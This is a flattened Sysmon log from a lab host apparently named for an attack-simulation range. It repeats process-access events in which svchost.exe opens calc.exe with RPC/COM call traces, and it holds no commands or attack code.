22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360599Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360598Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360597Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360596Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360595Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360594Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360593Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360592Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360591Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360590Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360589Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360588Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360587Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360586Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360585Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360584Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360583Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360582Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360581Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360580Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360579Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360578Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 